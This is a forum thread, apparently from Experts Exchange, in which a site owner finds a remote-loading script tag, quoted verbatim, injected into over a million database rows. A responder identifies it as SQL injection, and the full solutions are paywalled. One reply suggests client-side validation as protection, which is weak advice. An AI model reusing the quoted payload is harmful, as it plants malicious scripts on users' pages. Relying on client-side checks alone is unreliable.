newbie27
asked on
possible attack on my SQL server 2005 DB?
Hello Experts,
I have found a strange block of javascript got apended to one of the customers table field in my database .
The jscript looks something like this
<SCRIPT SRC=HTTP://2677.IN/YAHOO.JS></SCRIPT>
And I found this in almost every row of 1123200 records in the table.
I dont understand how this got added but this seems to have happend only today.
Please can someone advise if this make sense? Is this possible to someone update the database field which I have saved and secured on my dedicate server hosting.
Your help would greatly be appreciated.
Thanks
Sam
I have found a strange block of javascript got apended to one of the customers table field in my database .
The jscript looks something like this
<SCRIPT SRC=HTTP://2677.IN/YAHOO.JS></SCRIPT>
And I found this in almost every row of 1123200 records in the table.
I dont understand how this got added but this seems to have happend only today.
Please can someone advise if this make sense? Is this possible to someone update the database field which I have saved and secured on my dedicate server hosting.
Your help would greatly be appreciated.
Thanks
Sam
Sounds like a SQL injection attack. Are you using form fields or URL parameters on the site?
ASKER
Yes I have got the registration pages where I accept data from the customers using form fields...
How can I stop happening again please advise.
Thanks
How can I stop happening again please advise.
Thanks
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
...or validate the form data on the client end and prevent symbols from being entered in the first place.
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.